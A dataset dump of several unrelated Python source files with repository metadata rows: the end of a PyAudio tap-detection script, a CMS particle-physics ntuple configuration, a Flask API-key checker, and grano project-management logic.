# Par exemple un amplificateur de puissance 100 W efficace (ou RMS) fournit une puissance crête (max) de 200W voire 400W sur des impulsions très brèves (s’il ne grille pas avant).
# Cette puissance impulsionnelle qui ne veut pas dire grand chose est parfois indiquée comme étant la puissance Musicale de l’amplificateur.
# RMS amplitude is defined as the square root of the
# mean over time of the square of the amplitude.
# so we need to convert this string of bytes into
# a string of 16-bit samples...
# we will get one short out for each
# two chars in the string.
count = len(block)/2
format = "%dh"%(count)
shorts = struct.unpack( format, block )
# iterate over the block.
sum_squares = 0.0
for sample in shorts:
# sample is a signed short in +/- 32768.
# normalize it to 1.0
n = sample * SHORT_NORMALIZE
sum_squares += n*n
return math.sqrt( sum_squares / count )
pa = pyaudio.PyAudio() #]
#|
stream = pa.open(format = FORMAT, #|
channels = CHANNELS, #|---- You always use this in pyaudio...
rate = RATE, #|
input = True, #|
frames_per_buffer = INPUT_FRAMES_PER_BLOCK) #]
tap_threshold = INITIAL_TAP_THRESHOLD #]
noisycount = MAX_TAP_BLOCKS+1 #|---- Variables for noise detector...
quietcount = 0 #|
errorcount = 0 #]
for i in range(1000):
try: #]
block = stream.read(INPUT_FRAMES_PER_BLOCK) #|
except (IOError,e): #|---- just in case there is an error!
errorcount += 1 #|
print( "(%d) Error recording: %s"%(errorcount,e) ) #|
noisycount = 1 #]
amplitude = get_rms(block) # Root mean Square va permettre de calculer l'amplitude d'un son en streaming
print(amplitude)
if amplitude > tap_threshold: # if its to loud... bruyant
quietcount = 0
noisycount += 1
if noisycount > OVERSENSITIVE:
tap_threshold *= 1.1 # turn down the sensitivity
else: # if its to quiet...
if 1 <= noisycount <= MAX_TAP_BLOCKS:
print('tap!')
noisycount = 0
quietcount += 1
if quietcount > UNDERSENSITIVE:
tap_threshold *= 0.9 # turn up the sensitivity
| [
"[email protected]"
] | |
2975fada24e5de6073f3665b576d5bfed9ad8568 | 17c280ade4159d4d8d5a48d16ba3989470eb3f46 | /16/data/ExoDiBosonResonances/EDBRTreeMaker/test/7.py | 78cf2c490288af70a24998316d1b5ba736dd0d07 | [] | no_license | chengchen1993/run2_ntuple | 798ff18489ff5185dadf3d1456a4462e1dbff429 | c16c2b203c05a3eb77c769f63a0bcdf8b583708d | refs/heads/master | 2021-06-25T18:27:08.534795 | 2021-03-15T06:08:01 | 2021-03-15T06:08:01 | 212,079,804 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 27,621 | py | import FWCore.ParameterSet.Config as cms
process = cms.Process( "TEST" )
#process.options = cms.untracked.PSet(wantSummary = cms.untracked.bool(True))
process.options = cms.untracked.PSet(wantSummary = cms.untracked.bool(True),allowUnscheduled=cms.untracked.bool(True))
#,
# SkipEvent = cms.untracked.vstring('ProductNotFound'))
filterMode = False # True
######## Sequence settings ##########
corrJetsOnTheFly = True
runOnMC = False
runOnSig = False
DOHLTFILTERS = True
#useJSON = not (runOnMC)
#JSONfile = 'Cert_246908-258750_13TeV_PromptReco_Collisions15_25ns_JSON.txt'
#****************************************************************************************************#
#process.load('Configuration/StandardSequences/FrontierConditions_GlobalTag_cff')
process.load('Configuration.StandardSequences.GeometryRecoDB_cff')
process.load('Configuration/StandardSequences/FrontierConditions_GlobalTag_condDBv2_cff')
from Configuration.AlCa.GlobalTag import GlobalTag
if runOnMC:
process.GlobalTag.globaltag = '80X_mcRun2_asymptotic_2016_TrancheIV_v8'#'MCRUN2_74_V9::All'
#process.GlobalTag.globaltag = '94X_mc2017_realistic_v14'#'MCRUN2_74_V9::All'
elif not(runOnMC):
process.GlobalTag.globaltag = '80X_dataRun2_2016SeptRepro_v7'
# https://twiki.cern.ch/twiki/bin/view/CMSPublic/WorkBookMiniAOD2015#ETmiss_filters
# For the RunIISummer15DR74 MC campaing, the process name in PAT.
# For Run2015B PromptReco Data, the process name is RECO.
# For Run2015B re-MiniAOD Data 17Jul2015, the process name is PAT.
hltFiltersProcessName = 'RECO'
if runOnMC:
hltFiltersProcessName = 'PAT' #'RECO'
#if DOHLTFILTERS and not(runOnMC):
process.load('CommonTools.RecoAlgos.HBHENoiseFilterResultProducer_cfi')
process.HBHENoiseFilterResultProducer.minZeros = cms.int32(99999)
process.HBHENoiseFilterResultProducer.IgnoreTS4TS5ifJetInLowBVRegion=cms.bool(False)
process.HBHENoiseFilterResultProducer.defaultDecision = cms.string("HBHENoiseFilterResultRun2Loose")
process.ApplyBaselineHBHENoiseFilter = cms.EDFilter('BooleanFlagFilter',
inputLabel = cms.InputTag('HBHENoiseFilterResultProducer','HBHENoiseFilterResult'),
reverseDecision = cms.bool(False)
)
process.ApplyBaselineHBHEIsoNoiseFilter = cms.EDFilter('BooleanFlagFilter',
inputLabel = cms.InputTag('HBHENoiseFilterResultProducer','HBHEIsoNoiseFilterResult'),
reverseDecision = cms.bool(False)
)
######### read JSON file for data ##########
'''if not(runOnMC) and useJSON:
import FWCore.PythonUtilities.LumiList as LumiList
import FWCore.ParameterSet.Types as CfgTypes
process.source.lumisToProcess = CfgTypes.untracked(CfgTypes.VLuminosityBlockRange())
myLumis = LumiList.LumiList(filename = JSONfile).getCMSSWString().split(',')
process.source.lumisToProcess.extend(myLumis)
'''
# ---------------------------------------------------------
# DeepAK8: set up TransientTrackBuilder
process.load('Configuration.StandardSequences.MagneticField_cff')
process.TransientTrackBuilderESProducer = cms.ESProducer("TransientTrackBuilderESProducer",
ComponentName=cms.string('TransientTrackBuilder')
)
# ---------------------------------------------------------
####### Redo Jet clustering sequence ##########
from RecoJets.Configuration.RecoPFJets_cff import ak4PFJetsCHS, ak8PFJetsCHS, ak8PFJetsCHSPruned, ak8PFJetsCHSSoftDrop, ak8PFJetsCHSPrunedMass, ak8PFJetsCHSSoftDropMass# , ak8PFJetsCSTrimmed, ak8PFJetsCSFiltered, ak8PFJetsCHSFilteredMass, ak8PFJetsCHSTrimmedMass
from CommonTools.PileupAlgos.Puppi_cff import puppi
process.puppi = puppi.clone()
process.puppi.useExistingWeights = True
process.puppi.candName = cms.InputTag('packedPFCandidates')
process.puppi.vertexName = cms.InputTag('offlineSlimmedPrimaryVertices')
process.ak8PFJetsCHS = ak8PFJetsCHS.clone( src = 'puppi', jetPtMin = 100.0 )
process.ak8PFJetsCHSPruned = ak8PFJetsCHSPruned.clone( src = 'puppi', jetPtMin = 100.0 )
process.ak8PFJetsCHSPrunedMass = ak8PFJetsCHSPrunedMass.clone()
process.ak8PFJetsCHSSoftDrop = ak8PFJetsCHSSoftDrop.clone( src = 'puppi', jetPtMin = 100.0 )
process.ak8PFJetsCHSSoftDropMass = ak8PFJetsCHSSoftDropMass.clone()
process.NjettinessAK8 = cms.EDProducer("NjettinessAdder",
src = cms.InputTag("ak8PFJetsCHS"),
Njets = cms.vuint32(1, 2, 3, 4),
# variables for measure definition :
measureDefinition = cms.uint32( 0 ), # CMS default is normalized measure
beta = cms.double(1.0), # CMS default is 1
R0 = cms.double( 0.8 ), # CMS default is jet cone size
Rcutoff = cms.double( 999.0), # not used by default
# variables for axes definition :
axesDefinition = cms.uint32( 6 ), # CMS default is 1-pass KT axes
nPass = cms.int32(0), # not used by default
akAxesR0 = cms.double(-999.0) # not used by default
)
process.substructureSequence = cms.Sequence()
process.substructureSequence+=process.puppi
process.substructureSequence+=process.ak8PFJetsCHS
process.substructureSequence+=process.NjettinessAK8
process.substructureSequence+=process.ak8PFJetsCHSPruned
process.substructureSequence+=process.ak8PFJetsCHSPrunedMass
process.substructureSequence+=process.ak8PFJetsCHSSoftDrop
process.substructureSequence+=process.ak8PFJetsCHSSoftDropMass
####### Redo pat jets sequence ##########
process.redoPatJets = cms.Sequence()
process.redoPrunedPatJets = cms.Sequence()
process.redoSoftDropPatJets = cms.Sequence()
from ExoDiBosonResonances.EDBRJets.redoPatJets_cff import patJetCorrFactorsAK8, patJetsAK8, selectedPatJetsAK8
# Redo pat jets from ak8PFJetsCHS
process.patJetCorrFactorsAK8 = patJetCorrFactorsAK8.clone( src = 'ak8PFJetsCHS' )
process.patJetsAK8 = patJetsAK8.clone( jetSource = 'ak8PFJetsCHS' )
process.patJetsAK8.userData.userFloats.src = [ cms.InputTag("ak8PFJetsCHSPrunedMass"), cms.InputTag("ak8PFJetsCHSSoftDropMass"), cms.InputTag("NjettinessAK8:tau1"), cms.InputTag("NjettinessAK8:tau2"), cms.InputTag("NjettinessAK8:tau3"), cms.InputTag("NjettinessAK8:tau4")]
process.patJetsAK8.jetCorrFactorsSource = cms.VInputTag( cms.InputTag("patJetCorrFactorsAK8") )
process.selectedPatJetsAK8 = selectedPatJetsAK8.clone( cut = cms.string('pt > 100') )
process.redoPatJets+=process.patJetCorrFactorsAK8
process.redoPatJets+=process.patJetsAK8
process.redoPatJets+=process.selectedPatJetsAK8
# Redo pat jets ak8PFJetsCHSPruned
process.patJetCorrFactorsAK8Pruned = patJetCorrFactorsAK8.clone( src = 'ak8PFJetsCHSPruned' )
process.patJetsAK8Pruned = patJetsAK8.clone( jetSource = 'ak8PFJetsCHSPruned' )
process.patJetsAK8Pruned.userData.userFloats.src = [ "" ]
#process.patJetsAK8Pruned.userData.userFloats =cms.PSet(src = cms.VInputTag(""))
process.patJetsAK8Pruned.jetCorrFactorsSource = cms.VInputTag( cms.InputTag("patJetCorrFactorsAK8Pruned") )
process.selectedPatJetsAK8Pruned = selectedPatJetsAK8.clone(cut = 'pt > 100', src = "patJetsAK8Pruned")
process.redoPrunedPatJets+=process.patJetCorrFactorsAK8Pruned
process.redoPrunedPatJets+=process.patJetsAK8Pruned
process.redoPrunedPatJets+=process.selectedPatJetsAK8Pruned
# Redo pat jets ak8PFJetsCHSSoftDrop
process.patJetCorrFactorsAK8Softdrop = patJetCorrFactorsAK8.clone( src = 'ak8PFJetsCHSSoftDrop' )
process.patJetsAK8Softdrop = patJetsAK8.clone( jetSource = 'ak8PFJetsCHSSoftDrop' )
process.patJetsAK8Softdrop.userData.userFloats.src = [ "" ]
#process.patJetsAK8Softdrop.userData.userFloats =cms.PSet(src = cms.VInputTag(""))
process.patJetsAK8Softdrop.jetCorrFactorsSource = cms.VInputTag( cms.InputTag("patJetCorrFactorsAK8Softdrop") )
process.selectedPatJetsAK8Softdrop = selectedPatJetsAK8.clone(cut = 'pt > 100', src = "patJetsAK8Softdrop")
from PhysicsTools.PatAlgos.tools.jetTools import addJetCollection
## PATify soft drop subjets
addJetCollection(
process,
labelName = 'AK8SoftDropSubjets',
jetSource = cms.InputTag('ak8PFJetsCHSSoftDrop','SubJets'),
algo = 'ak', # needed for subjet flavor clustering
rParam = 0.8, # needed for subjet flavor clustering
getJetMCFlavour = False,
pvSource = cms.InputTag( 'offlineSlimmedPrimaryVertices' ),
genJetCollection = cms.InputTag('slimmedGenJets'),
genParticles = cms.InputTag( 'prunedGenParticles' ),
btagDiscriminators = ['None'],
jetCorrections = ('AK4PFPuppi', ['L2Relative', 'L3Absolute'], 'None'),
# explicitJTA = True, # needed for subjet b tagging
# svClustering = True, # needed for subjet b tagging
# fatJets=cms.InputTag('ak8PFJetsCHS'), # needed for subjet flavor clustering
# groomedFatJets=cms.InputTag('ak8PFJetsCHSSoftDrop') # needed for subjet flavor clustering
)
#'''
#from RecoBTag.DeepFlavour.DeepFlavourJetTagsProducer_cfi import *
# this loads all available b-taggers
#process.load("RecoBTag.Configuration.RecoBTag_cff")
#process.load("RecoBTag.DeepFlavour.DeepFlavourJetTagsProducer_cfi")
#process.load("RecoBTag.DeepFlavour.deepFlavour_cff")
#'''
from RecoBTag.Configuration.RecoBTag_EventContent_cff import *
from RecoBTag.Configuration.RecoBTag_cff import *
from RecoBTag.DeepFlavour.DeepFlavourJetTagsProducer_cfi import deepFlavourJetTags
from RecoBTag.DeepFlavour.deepFlavour_cff import *
from PhysicsTools.PatAlgos.tools.jetTools import updateJetCollection
updateJetCollection(
process,
labelName = 'DeepFlavour',
jetSource = cms.InputTag('cleanPuppiAK4'),
pvSource = cms.InputTag('offlineSlimmedPrimaryVertices'),
svSource = cms.InputTag('slimmedSecondaryVertices'),
jetCorrections = ('AK4PFchs', cms.vstring(['L1FastJet', 'L2Relative', 'L3Absolute']), 'None'),
btagDiscriminators = ['deepFlavourJetTags:probb', 'deepFlavourJetTags:probbb','deepFlavourJetTags:probc','deepFlavourJetTags:probudsg','deepFlavourJetTags:probcc'],
postfix='NewDFTraining'
)
#process.selectedUpdatedPatJetsDeepFlavourNewDFTraining.userData.userFloats.src =[]
#'''
'''
process.patjets = cms.EDAnalyzer('EDBRTreeMaker',
PatJets = cms.InputTag("selectedUpdatedPatJets"),
PTMin = cms.double(-1),
BTag = cms.string("deepFlavourJetTags:probb"),
)
'''
process.selectedPatJetsAK8SoftDropPacked = cms.EDProducer("BoostedJetMerger",
jetSrc = cms.InputTag("selectedPatJetsAK8Softdrop"),
subjetSrc = cms.InputTag("selectedPatJetsAK8SoftDropSubjets")
)
process.redoSoftDropPatJets+=process.patJetCorrFactorsAK8Softdrop
process.redoSoftDropPatJets+=process.patJetsAK8Softdrop
process.redoSoftDropPatJets+=process.selectedPatJetsAK8Softdrop
option = 'RECO'
process.load("ExoDiBosonResonances.EDBRCommon.goodMuons_cff")
process.load("ExoDiBosonResonances.EDBRCommon.goodElectrons_cff")
process.load("ExoDiBosonResonances.EDBRCommon.goodJets_cff")
process.load("ExoDiBosonResonances.EDBRCommon.leptonicW_cff")
process.load("ExoDiBosonResonances.EDBRCommon.hadronicW_cff")
process.load("ExoDiBosonResonances.EDBRCommon.goodPuppi_cff")
if option == 'RECO':
process.goodMuons.src = "slimmedMuons"
process.goodElectrons.src = "slimmedElectrons"
process.goodJets.src = "slimmedJetsAK8"
# process.goodJets.src = "selectedPatJetsAK8"
process.Wtoenu.MET = "slimmedMETs"
process.Wtomunu.MET = "slimmedMETs"
process.goodPuppi.src = "selectedPatJetsAK8"
process.goodOfflinePrimaryVertex = cms.EDFilter("VertexSelector",
src = cms.InputTag("offlineSlimmedPrimaryVertices"),
cut = cms.string("chi2!=0 && ndof >= 4.0 && abs(z) <= 24.0 && abs(position.Rho) <= 2.0"),
filter = cms.bool(True)
)
if option == 'RECO':
process.hadronicV.cut = ' '
if option == 'GEN':
process.hadronicV.cut = ' '
WBOSONCUT = "pt > 200.0"
process.leptonicVSelector = cms.EDFilter("CandViewSelector",
src = cms.InputTag("leptonicV"),
cut = cms.string( WBOSONCUT ),
filter = cms.bool(True)
)
process.leptonicVFilter = cms.EDFilter("CandViewCountFilter",
src = cms.InputTag("leptonicV"),
minNumber = cms.uint32(1),
filter = cms.bool(True)
)
process.hadronicVFilter = cms.EDFilter("CandViewCountFilter",
src = cms.InputTag("hadronicV"),
minNumber = cms.uint32(1),
filter = cms.bool(True)
)
process.graviton = cms.EDProducer("CandViewCombiner",
decay = cms.string("leptonicV hadronicV"),
checkCharge = cms.bool(False),
cut = cms.string("mass > 180"),
roles = cms.vstring('leptonicV', 'hadronicV'),
)
process.gravitonFilter = cms.EDFilter("CandViewCountFilter",
src = cms.InputTag("graviton"),
minNumber = cms.uint32(1),
filter = cms.bool(True)
)
from PhysicsTools.SelectorUtils.tools.vid_id_tools import *
switchOnVIDElectronIdProducer(process, DataFormat.MiniAOD)
my_id_modules = ['RecoEgamma.ElectronIdentification.Identification.heepElectronID_HEEPV70_cff']
for idmod in my_id_modules:
setupAllVIDIdsInModule(process,idmod,setupVIDElectronSelection)
process.leptonSequence = cms.Sequence(process.muSequence +
process.egmGsfElectronIDSequence*process.eleSequence +
process.leptonicVSequence +
process.leptonicVSelector +
process.leptonicVFilter )
process.jetSequence = cms.Sequence(process.substructureSequence +
process.redoPatJets +
process.redoPrunedPatJets+
process.redoSoftDropPatJets+
process.fatJetsSequence +
process.fatPuppiSequence+
process.hadronicV +
process.hadronicVFilter)
process.gravitonSequence = cms.Sequence(process.graviton +
process.gravitonFilter)
if filterMode == False:
process.goodOfflinePrimaryVertex.filter = False
process.Wtomunu.cut = ''
process.Wtoenu.cut = ''
process.leptonicVSelector.filter = False
process.leptonicVSelector.cut = ''
process.hadronicV.cut = ''
process.graviton.cut = ''
process.leptonicVFilter.minNumber = 0
process.hadronicVFilter.minNumber = 0
process.gravitonFilter.minNumber = 0
process.load('RecoMET.METFilters.BadPFMuonFilter_cfi')
process.load("RecoMET.METFilters.BadChargedCandidateFilter_cfi")
process.BadPFMuonFilter.muons = cms.InputTag("slimmedMuons")
process.BadPFMuonFilter.PFCandidates = cms.InputTag("packedPFCandidates")
process.BadChargedCandidateFilter.muons = cms.InputTag("slimmedMuons")
process.BadChargedCandidateFilter.PFCandidates = cms.InputTag("packedPFCandidates")
process.metfilterSequence = cms.Sequence(process.BadPFMuonFilter+process.BadChargedCandidateFilter)
######### JEC ########
METS = "slimmedMETs"
jetsAK8 = "slimmedJetsAK8"
jetsAK8pruned = "slimmedJetsAK8"
jetsAK8softdrop = "slimmedJetsAK8"
jetsAK8puppi = "cleanPuppi"
if runOnMC:
jecLevelsAK8chs = [
'Summer16_23Sep2016V3_MC_L1FastJet_AK8PFchs.txt',
'Summer16_23Sep2016V3_MC_L2Relative_AK8PFchs.txt',
'Summer16_23Sep2016V3_MC_L3Absolute_AK8PFchs.txt'
]
jecLevelsAK8chsGroomed = [
'Summer16_23Sep2016V3_MC_L2Relative_AK8PFchs.txt',
'Summer16_23Sep2016V3_MC_L3Absolute_AK8PFchs.txt'
]
jecLevelsAK8puppi = [
'Summer16_23Sep2016V3_MC_L1FastJet_AK8PFPuppi.txt',
'Summer16_23Sep2016V3_MC_L2Relative_AK8PFPuppi.txt',
'Summer16_23Sep2016V3_MC_L3Absolute_AK8PFPuppi.txt'
]
jecLevelsAK8puppiGroomed = [
'Summer16_23Sep2016V3_MC_L2Relative_AK8PFPuppi.txt',
'Summer16_23Sep2016V3_MC_L3Absolute_AK8PFPuppi.txt'
]
BjecLevelsAK4chs = [
'Summer16_23Sep2016V3_MC_L1FastJet_AK4PFPuppi.txt',
'Summer16_23Sep2016V3_MC_L2Relative_AK4PFPuppi.txt',
'Summer16_23Sep2016V3_MC_L3Absolute_AK4PFPuppi.txt'
]
jecLevelsAK4chs = [
'Summer16_23Sep2016V3_MC_L1FastJet_AK4PFchs.txt',
'Summer16_23Sep2016V3_MC_L2Relative_AK4PFchs.txt',
'Summer16_23Sep2016V3_MC_L3Absolute_AK4PFchs.txt'
]
else:
jecLevelsAK8chs = [
'Summer16_23Sep2016BCDV4_DATA_L1FastJet_AK8PFchs.txt',
'Summer16_23Sep2016BCDV4_DATA_L2Relative_AK8PFchs.txt',
'Summer16_23Sep2016BCDV4_DATA_L3Absolute_AK8PFchs.txt',
'Summer16_23Sep2016BCDV4_DATA_L2L3Residual_AK8PFchs.txt'
]
jecLevelsAK8chsGroomed = [
'Summer16_23Sep2016BCDV4_DATA_L2Relative_AK8PFchs.txt',
'Summer16_23Sep2016BCDV4_DATA_L3Absolute_AK8PFchs.txt',
'Summer16_23Sep2016BCDV4_DATA_L2L3Residual_AK8PFchs.txt'
]
jecLevelsAK8puppi = [
'Summer16_23Sep2016BCDV4_DATA_L1FastJet_AK8PFPuppi.txt',
'Summer16_23Sep2016BCDV4_DATA_L2Relative_AK8PFPuppi.txt',
'Summer16_23Sep2016BCDV4_DATA_L3Absolute_AK8PFPuppi.txt',
'Summer16_23Sep2016BCDV4_DATA_L2L3Residual_AK8PFPuppi.txt'
]
jecLevelsAK8puppiGroomed = [
'Summer16_23Sep2016BCDV4_DATA_L2Relative_AK8PFPuppi.txt',
'Summer16_23Sep2016BCDV4_DATA_L3Absolute_AK8PFPuppi.txt',
'Summer16_23Sep2016BCDV4_DATA_L2L3Residual_AK8PFPuppi.txt'
]
BjecLevelsAK4chs = [
'Summer16_23Sep2016BCDV4_DATA_L1FastJet_AK8PFPuppi.txt',
'Summer16_23Sep2016BCDV4_DATA_L2Relative_AK8PFPuppi.txt',
'Summer16_23Sep2016BCDV4_DATA_L3Absolute_AK8PFPuppi.txt',
'Summer16_23Sep2016BCDV4_DATA_L2L3Residual_AK8PFPuppi.txt'
]
jecLevelsAK4chs = [
'Summer16_23Sep2016BCDV4_DATA_L1FastJet_AK4PFPuppi.txt',
'Summer16_23Sep2016BCDV4_DATA_L2Relative_AK4PFPuppi.txt',
'Summer16_23Sep2016BCDV4_DATA_L3Absolute_AK4PFPuppi.txt',
'Summer16_23Sep2016BCDV4_DATA_L2L3Residual_AK4PFPuppi.txt'
]
process.treeDumper = cms.EDAnalyzer("EDBRTreeMaker",
originalNEvents = cms.int32(1),
crossSectionPb = cms.double(1),
targetLumiInvPb = cms.double(1.0),
EDBRChannel = cms.string("VW_CHANNEL"),
lhe = cms.InputTag("externalLHEProducer"),
isGen = cms.bool(False),
isJEC = cms.bool(corrJetsOnTheFly),
RunOnMC = cms.bool(runOnMC),
RunOnSig = cms.bool(runOnSig),
generator = cms.InputTag("generator"),
genSrc = cms.InputTag("prunedGenParticles"),
pileup = cms.InputTag("slimmedAddPileupInfo"),
leptonicVSrc = cms.InputTag("leptonicV"),
gravitonSrc = cms.InputTag("graviton"),
looseMuonSrc = cms.InputTag("looseMuons"),
looseElectronSrc = cms.InputTag("looseElectrons"),
vetoMuonSrc = cms.InputTag("vetoMuons"),
vetoElectronSrc = cms.InputTag("vetoElectrons"),
goodMuSrc = cms.InputTag("goodMuons"),
MuSrc = cms.InputTag("slimmedMuons"),
EleSrc = cms.InputTag("slimmedElectrons"),
t1muSrc = cms.InputTag("slimmedMuons"),
metSrc = cms.InputTag("slimmedMETs"),
mets = cms.InputTag(METS),
#ak4jetsSrc = cms.InputTag("cleanAK4Jets"),
ak4jetsSrc = cms.InputTag("selectedUpdatedPatJetsDeepFlavourNewDFTraining"),
#ak4jetsSrc = cms.InputTag("slimmedJetPuppi"),
hadronicVSrc = cms.InputTag("hadronicV"),
hadronicVSrc_raw = cms.InputTag("slimmedJetsAK8"),
hadronicVSoftDropSrc = cms.InputTag("selectedPatJetsAK8SoftDropPacked"),
jets = cms.InputTag("slimmedJets"),
ak8JetSrc = cms.InputTag(jetsAK8),
fatjets = cms.InputTag(jetsAK8),
prunedjets = cms.InputTag(jetsAK8pruned),
softdropjets = cms.InputTag(jetsAK8softdrop),
puppijets = cms.InputTag(jetsAK8puppi),
jecAK8chsPayloadNames = cms.vstring( jecLevelsAK8chs ),
jecAK8chsPayloadNamesGroomed = cms.vstring( jecLevelsAK8chsGroomed ),
jecAK4chsPayloadNames = cms.vstring( jecLevelsAK4chs ),
BjecAK4chsPayloadNames = cms.vstring( BjecLevelsAK4chs ),
jecAK8puppiPayloadNames = cms.vstring( jecLevelsAK8puppi ),
jecAK8puppiPayloadNamesGroomed = cms.vstring( jecLevelsAK8puppiGroomed ),
jecpath = cms.string(''),
rho = cms.InputTag("fixedGridRhoFastjetAll"),
electronIDs = cms.InputTag("heepElectronID-HEEPV50-CSA14-25ns"),
muons = cms.InputTag("slimmedMuons"),
vertices = cms.InputTag("offlineSlimmedPrimaryVertices"),
hltToken = cms.InputTag("TriggerResults","","HLT"),
muPaths1 = cms.vstring("HLT_PFHT650_WideJetMJJ900DEtaJJ1p5_v*"),
muPaths2 = cms.vstring("HLT_PFHT800_v*"),
muPaths3 = cms.vstring("HLT_PFHT900_v*"),
muPaths4 = cms.vstring("HLT_PFJet450_v*"),
muPaths5 = cms.vstring("HLT_PFJet500_v*"),
muPaths6 = cms.vstring("HLT_AK8PFJet450_v*"),
muPaths7 = cms.vstring("HLT_AK8PFJet500_v*"),
muPaths8 = cms.vstring("HLT_AK8PFJet360_TrimMass30_v*"),
muPaths9 = cms.vstring("HLT_AK8PFHT700_TrimR0p1PT0p03Mass50_v*"),
muPaths10 = cms.vstring("HLT_PFHT650_WideJetMJJ950DEtaJJ1p5_v*"),
el1 = cms.vstring("HLT_Ele45_WPLoose_Gsf_v*"),
el2 = cms.vstring("HLT_Ele115_CaloIdVT_GsfTrkIdT_v*"),#("HLT_Ele35_WPLoose_Gsf_v*"),
el3 = cms.vstring("HLT_Ele27_WPTight_Gsf_v*"),
mu1 = cms.vstring("HLT_Mu50_v*"), #B2G-15-005
mu2 = cms.vstring("HLT_TkMu50_v*"), #B2G-15-005
mu3 = cms.vstring("HLT_PFMETNoMu120_PFMHTNoMu120_IDTight_v*"),
mu4 = cms.vstring("HLT_PFMETNoMu110_PFMHTNoMu110_IDTight_v*"),
noiseFilter = cms.InputTag('TriggerResults','', hltFiltersProcessName),
noiseFilterSelection_HBHENoiseFilter = cms.string('Flag_HBHENoiseFilter'),
noiseFilterSelection_HBHENoiseIsoFilter = cms.string("Flag_HBHENoiseIsoFilter"),
noiseFilterSelection_GlobalTightHaloFilter = cms.string('Flag_globalTightHalo2016Filter'),
noiseFilterSelection_EcalDeadCellTriggerPrimitiveFilter = cms.string('Flag_EcalDeadCellTriggerPrimitiveFilter'),
noiseFilterSelection_goodVertices = cms.string('Flag_goodVertices'),
noiseFilterSelection_eeBadScFilter = cms.string('Flag_eeBadScFilter'),
noiseFilterSelection_badMuon = cms.InputTag('BadPFMuonFilter'),
noiseFilterSelection_badChargedHadron = cms.InputTag('BadChargedCandidateFilter'),
)
if option=='GEN':
process.treeDumper.metSrc = 'genMetTrue'
process.treeDumper.isGen = True
process.analysis = cms.Path(process.leptonSequence +
#process.substructureSequence+
#process.redoPatJets+
#process.redoPrunedPatJets+
#process.redoSoftDropPatJets+
process.HBHENoiseFilterResultProducer+
process.ApplyBaselineHBHENoiseFilter+
process.ApplyBaselineHBHEIsoNoiseFilter+
process.jetSequence +
process.metfilterSequence +
process.gravitonSequence +
process.treeDumper)
if option=='RECO':
process.analysis.replace(process.leptonSequence, process.goodOfflinePrimaryVertex + process.leptonSequence)
process.load("ExoDiBosonResonances.EDBRCommon.data.RSGravitonToWW_kMpl01_M_1000_Tune4C_13TeV_pythia8")
process.source.fileNames = [
"/store/data/Run2016B/JetHT/MINIAOD/23Sep2016-v1/90000/EAF9587D-8082-E611-A783-0CC47A13CD56.root"
#"/store/data/Run2016B/JetHT/MINIAOD/23Sep2016-v1/90000/FE47EB9B-EB81-E611-B475-24BE05CEEB81.root"
#"/store/data/Run2016E/JetHT/MINIAOD/23Sep2016-v1/50000/483CEE4F-FB86-E611-94C8-0CC47A7C3572.root"
]
process.maxEvents.input = 2000
process.load("FWCore.MessageLogger.MessageLogger_cfi")
process.MessageLogger.cerr.FwkReport.reportEvery = 5000
process.MessageLogger.cerr.FwkReport.limit = 99999999
process.TFileService = cms.Service("TFileService",
fileName = cms.string("RStreeEDBR_pickup7.root")
)
| [
"[email protected]"
] | |
b956a071a1cd830747a03be5cfbe515c771eb205 | 5eba0ee342adf574664ef2c5b2a9787f28ad9e4a | /core/utils/auth.py | 35059117c9a7332bc93e926280bf0e24a81a7e90 | [] | no_license | nagibator95/ejudge-front | 2775875bd8d8367674b3c5c372b5fafa77167aac | ca355f473702561047da030b7d4a12af06539395 | refs/heads/master | 2020-04-10T06:59:53.873278 | 2018-12-20T20:15:36 | 2018-12-20T20:15:36 | 160,870,700 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 568 | py | from flask import request
from werkzeug.exceptions import Forbidden
def get_api_key_checker(key) -> callable:
""" Function which returns function which checks request api key
Basic usage:
app = Flask()
app.before_request(get_api_key_checker(<my-secret-string>))
Raises
------
Forbidden: when api key is bad or not allowed
"""
def check_api_key():
requested_key = request.headers.get('api-key')
if key != requested_key:
raise Forbidden('API key is not valid!')
return check_api_key
| [
"[email protected]"
] | |
9ac19c4aea106efafa3ec76b9113214d59ee531f | d20d7d0887e044cb369687629eee04d03bc6ac15 | /grano/logic/projects.py | cc54f580a84a76c3afff8ddffdeb95bdd13d3aa3 | [
"MIT"
] | permissive | nimblemachine/grano | 947812bdd2a861e7d62bd081423df2723891989a | ffbd3f974867334d396d536bd000a20a314f9fc6 | refs/heads/master | 2021-01-18T11:24:51.750426 | 2014-03-24T10:39:35 | 2014-03-24T10:39:35 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,796 | py | import colander
from datetime import datetime
from grano.core import app, db, url_for
from grano.lib.exc import NotImplemented
from grano.logic.validation import database_name
from grano.logic.references import AccountRef
from grano.logic import accounts
from grano.model import Project
def validate(data, project):
same_project = lambda s: Project.by_slug(s) == project
same_project = colander.Function(same_project, message="Project exists")
class ProjectValidator(colander.MappingSchema):
slug = colander.SchemaNode(colander.String(),
validator=colander.All(database_name, same_project))
label = colander.SchemaNode(colander.String(),
validator=colander.Length(min=3))
private = colander.SchemaNode(colander.Boolean(),
missing=False)
author = colander.SchemaNode(AccountRef())
settings = colander.SchemaNode(colander.Mapping(),
missing={})
validator = ProjectValidator()
return validator.deserialize(data)
def save(data, project=None):
""" Create or update a project with a given slug. """
data = validate(data, project)
if project is None:
project = Project()
project.slug = data.get('slug')
project.author = data.get('author')
from grano.logic import permissions as permissions_logic
permissions_logic.save({
'account': data.get('author'),
'project': project,
'admin': True
})
project.settings = data.get('settings')
project.label = data.get('label')
project.private = data.get('private')
project.updated_at = datetime.utcnow()
db.session.add(project)
# TODO: make this nicer - separate files?
from grano.logic.schemata import import_schema
with app.open_resource('fixtures/base.yaml') as fh:
import_schema(project, fh)
db.session.flush()
return project
def delete(project):
raise NotImplemented()
def to_rest_index(project):
return {
'slug': project.slug,
'label': project.label,
'api_url': url_for('projects_api.view', slug=project.slug)
}
def to_rest_index_stats(project):
data = to_rest_index(project)
data['entities_count'] = project.entities.count()
data['relations_count'] = project.relations.count()
return data
def to_rest(project):
data = to_rest_index_stats(project)
data['settings'] = project.settings
data['author'] = accounts.to_rest_index(project.author)
data['schemata_index_url'] = url_for('schemata_api.index', slug=project.slug)
data['entities_index_url'] = url_for('entities_api.index', project=project.slug)
data['relations_index_url'] = url_for('relations_api.index', project=project.slug)
return data
| [
"[email protected]"
] | |
